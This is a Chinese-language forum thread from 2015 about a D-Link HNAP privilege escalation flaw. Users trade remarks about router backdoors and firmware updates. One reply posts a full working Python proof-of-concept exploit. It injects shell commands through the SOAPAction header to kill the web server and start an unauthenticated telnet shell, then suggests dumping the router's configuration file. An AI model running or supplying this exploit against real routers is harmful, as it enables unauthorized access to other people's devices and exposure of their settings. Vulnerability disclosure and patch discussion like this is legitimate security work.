davidyin
40.35D
13.02D

各大无线路由器品牌暴漏洞

  •  
  •   davidyin · Jun 3, 2015 · 4446 views
    This topic created in 4050 days ago, the information mentioned may be changed or developed.
    HNAP Privilege Escalation Vulnerability
    看看自己的路由器有没有出更新的固件。

    先去更新我的 D-Link Dir-850L
    7 replies    2015-06-03 14:39:32 +08:00
    lhbc
        1
    lhbc  
       Jun 3, 2015 via Android
    国产的全都有后门,还用查……
    princeofwales
        2
    princeofwales  
       Jun 3, 2015
    网件的会不会有问题,美帝的
    就是怕了国产的,再便宜都不想买
    lee015
        3
    lee015  
       Jun 3, 2015 via Android
    刷了开源固件还会有问题吗?
    ledzep2
        4
    ledzep2  
       Jun 3, 2015
    现在电信联通连个公网ip都不给, 想访问都找不着. 洗洗睡...
    Karblue
        5
    Karblue  
       Jun 3, 2015
    不是只影响Dlink么。国内厂商好像没有躺枪吧
    Karblue
        6
    Karblue  
       Jun 3, 2015
    #!/usr/bin/env python

    import sys
    import urllib2
    import httplib

    try:
    ip_port = sys.argv[1].split(':')
    ip = ip_port[0]

    if len(ip_port) == 2:
    port = ip_port[1]
    elif len(ip_port) == 1:
    port = "80"
    else:
    raise IndexError
    except IndexError:
    print "Usage: %s <target ip:port>" % sys.argv[0]
    sys.exit(1)

    url = "http://%s:%s/HNAP1" % (ip, port)
    # NOTE: If exploiting from the LAN, telnetd can be started on
    # any port; killing the http server and re-using its port
    # is not necessary.
    #
    # Killing off all hung hnap processes ensures that we can
    # re-start httpd later.
    command = "killall httpd; killall hnap; telnetd -p %s" % port
    headers = {
    "SOAPAction" : '"http://purenetworks.com/HNAP1/GetDeviceSettings/`%s`"' % command,
    }

    req = urllib2.Request(url, None, headers)
    try:
    urllib2.urlopen(req)
    raise Exception("Unexpected response")
    except httplib.BadStatusLine:
    print "Exploit sent, try telnetting to %s:%s!" % (ip, port)
    print "To dump all system settings, run (no quotes): 'xmldbc -d /var/config.xml; cat /var/config.xml'"
    sys.exit(0)
    except Exception:
    print "Received an unexpected response from the server; exploit probably failed. :("



    POC在此。从devttsy0大神po来的
    Karblue
        7
    Karblue  
       Jun 3, 2015
    还发现了devttsy0的吐槽。吐槽Dlink的补丁。看了一下神tm补丁打的真是捉急
    http://www.devttys0.com/2015/04/what-the-ridiculous-fuck-d-link/
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   2907 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 46ms · UTC 07:25 · PVG 15:25 · LAX 00:25 · JFK 03:25
    ♥ Do have faith in what you're doing.